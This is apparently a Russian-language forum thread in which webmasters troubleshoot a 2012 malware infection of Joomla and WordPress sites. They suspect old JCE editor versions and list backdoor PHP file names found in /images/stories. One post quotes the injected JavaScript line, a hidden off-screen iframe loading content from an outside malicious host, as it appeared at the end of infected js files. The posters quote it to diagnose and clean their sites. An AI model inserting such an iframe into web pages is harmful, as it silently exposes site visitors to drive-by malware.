Аналогичная проблема. Касперский ругается на все сайты. Другие антивирусы молчат. Заражены сайты с разными версиями joomla, а так же worppress. За день было замечено: Распространяется мгновенно. Через 1 час - 1,5 часа меняет ссылку в айфрейме. Все они располагаются на одном хостинге. Смена паролей от фтп не помогает. После полной заливки чистых сайтов через 10-15 минут все js файлы в конце кода снова заканчиваются строчками

Код
;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;"  src="dwdqodil.qhigh.com/b5e7875e8b414bb648b26.bav?11"></iframe>');

Поисковые системы пишут о вреде. Каспер не пускает на сайты.
На сервере isp manager.
www.h-online.com/open/news/item/Joomla-sites-misused-to-deploy-malware-1766841.html]Вот статья на похожую тему. Там во всем винят jce старых версий. Если у кого есть подскажите, может вместе начнем копать в этом направлении. У меня при заливке сайтов заново и обновлении/удалении jce происходит заражение. остается ток один вариант проверять каждый сайт на отдельном аккаунте. Но думаю это (около 40 сайтов) займет довольно огромное количество времени. Подскажите кто нибудь пожалуйста, что можно сделать. Спасибо заранее.

Цитата
Сергей Моисеев пишет: И у меня такая же проблема. Простые HTML сайты не затронуты. Только сайты с БД заражены. Мне кажется началось все это в промежуток между 19 и 21 декабря 2012 года. Раньше все было ОК. Хостинг JustHost. Техподдержка JustHost говорит: решение ищите сами, проблемы вирусов на плечах самих клиентов. Какой у кого хостинг? Что делать?

У меня рег.ру. Говорят тоже обновлять и исправлять. Вобщем пока не уверен, но что то вроде выделил. Отделил сайты на новой joomla и wordpress. Старые (1.5 joomla) перекидываю на другой аккаунт. Больше часа никаких зараженных скриптов. Теперь надо выделить из пяти старых виновника дырки. Думаю их по одному включать и наблюдать. Может быть это просто затишье перед бурей и я не прав. Может с утра опять все сайты подцепят. О результатах экспериментов со старыми версиями joomla отпишусь. Копайте в сторону jce. Где читал везде пишут на них.

Перезаливка сайта регулярная смена паролей, попытки догнать его до 1.5.26 + усиление безопасности, но начинать с проверки своего компа у меня был бекдор

Проблема обычно с jce. Судя по всему по Рунету продят сразу несколько разновидностей одного и того же виря.
Недавно описывал процедуру fstrange.ru/coder/about_all/joomla-poisk-virusov.html]лечения Джумлы у себя в уютном.
Обычно исполняемая часть прячется в папке /images и\или ее подпапках. Там php файл с шифрованным телом.  Смело можно удалять. С него заражаются js файлы.

Всем привет!
Сегодня столкнулся с такой  же проблемой. Все 10 сайтов на джумла заражены, на вордпрес еще не проверял, нашел вот такое /images/stories/.cache_izpx4z.php, но после ее удаления в течении 10 мин снова появляется...так что скорее всего еще где-то есть источник...продолжаю поиск.

Цитата
Владимир Сергеев пишет: Вроде решил проблему. Действительно в одном из сайтов в папке images/stories были php скрипты cache_9gcgrw.php koabook.php seoTySP.php story.php joomla 1.5.26 Вроде дырка в jce старой версии за 2009 год (версия 1.5

объясни поэтапно как искал, лечил...может, что похожее есть, в каких файлах...папках ?story.php тоже есть
что за дырка в jce ?

Каспер 2013 молчит, судя по всему все ок у вас, мож уполз